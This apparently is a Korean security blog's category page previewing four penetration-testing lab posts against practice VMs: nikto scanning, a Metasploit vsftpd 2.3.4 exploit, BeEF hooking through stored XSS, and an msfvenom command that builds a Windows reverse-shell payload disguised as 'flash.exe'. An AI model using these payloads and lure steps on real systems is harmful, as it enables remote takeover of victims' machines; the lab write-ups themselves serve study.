일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | ||||
4 | 5 | 6 | 7 | 8 | 9 | 10 |
11 | 12 | 13 | 14 | 15 | 16 | 17 |
18 | 19 | 20 | 21 | 22 | 23 | 24 |
25 | 26 | 27 | 28 | 29 | 30 | 31 |
- 메타코드
- 정처기 필기
- 메타코드M
- Path Traversal
- 블록체인
- web shell
- Session Manager
- 정처기
- web security academy
- splunk db connect
- 보안 그룹
- 정처기필기
- AWS SSM
- amazon s3 트리거
- web3 보안
- aws 트리거
- File Upload
- metacodem
- metacode
- 스마트컨트랙트
- 오블완
- 티스토리챌린지
- 탈중앙화
- 정보처리기사
- systems manager
- AWS CLI
- 스마트 컨트랙트
- ELB
- aws lambda
- web3
- Today
- Total
목록Security/Application (4)
min8282

정보 수집은 모의해킹의 가장 중요한 초기 단계로, 공격자가 대상 시스템의 구조와 특성을 파악하는 정찰 과정입니다. 이 글에서는 실제 도구와 기법을 통해 웹 모의해킹 시 정보 수집 단계에 대해서 정리해 보겠습니다.1. 웹 취약점 스캐닝칼리 리눅스에 기본으로 설치도어 있는 웹 스캐닝 프로그램 중에 nikto라는 프로그램이 있습니다. nikto를 이용하면 간단한 명령으로 중요한 정보를 쉽게 수집할 수 있습니다. 먼저 실습용 가상 머신(bWAPP 서비스)의 IP 주소를 입력하여 실행해 보겠습니다. 전체 출력 결과는 다음과 같습니다.┌──(kali㉿kali)-[~]└─$ nikto -host 192.168.183.130- Nikto v2.5.0--------------------------------------..

1. Metasploitable 서버 포트 스캔 및 vsftp 버전 정보 확인Nmap을 이용해 Metasploitable 서버(192.168.183.128)에 열린 포트를 확인했다. 그중 ftp 포트가 오픈되어 있고, vsftpd 2.3.4 버전을 사용 중인 것을 확인했다.2. Exploit-DB를 활용하여 해당 버전 취약점 검색Exploit-DB에서 해당 버전의 취약점을 검색한 결과, vsftpd 2.3.4 취약점 관련 두 개의 익스플로잇 코드가 검색됐다.3. Metasploit을 이용한 공격 수행먼저, Metasploit 실행한다. 실행 후, vsftpd 취약점 모듈을 검색하고 공격 모듈을 선택한다. show options 명령어를 입력하여 현재 설정된 옵션을 확인한다. 현재 공격 대상(타겟=Meta..

이 실습은 Stored XSS 취약점이 존재하는 게시판(bWAPP/XSS-Stored(Blog))을 BeEF와 함께 활용하는 환경을 가정한다.악성코드 파일 생성우선, 악성코드 파일을 생성하기 위해 아래 명령어를 사용한다.sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.183.129 LPORT=5555 -f exe -o flash.exe 위 명령어를 입력하면 flash.exe 파일이 생성된다.웹 서버 생성클라이언트가 flash.exe 파일을 다운로드할 수 있도록 웹 서버를 하나 만든다.python -m http://192.168.183.129:8000웹 브라우저에서 http://192.168.183.129:8000/flash.exe 주소로 접..

1. 가상 머신 설정실습을 위해 윈도우와 칼리 리눅스 가상 머신을 설정한다.윈도우 설정메모리: 2GB프로세서: 2개네트워크: NAT 설정절전 모드: 사용 안 함윈도우 업데이트: 사용 안 함2. 칼리 리눅스 환경 설정BeEF 설치 및 실행을 위해 칼리 리눅스에서 아래 명령어를 실행한다.sudo apt update sudo apt install beef-xss sudo beef-xssBeEF 첫 실행 시 비밀번호 설정 (예: 1234)브라우저에서 http://127.0.0.1:3000/ui/panel로 접속하여 BeEF 패널에 들어간다.BeEF 훅 URL: http://192.168.183.129:3000/hook.js3. bWAPP 게시판 악성코드 삽입bWAPP의 XSS-Stored(Blog)에 위와 같이..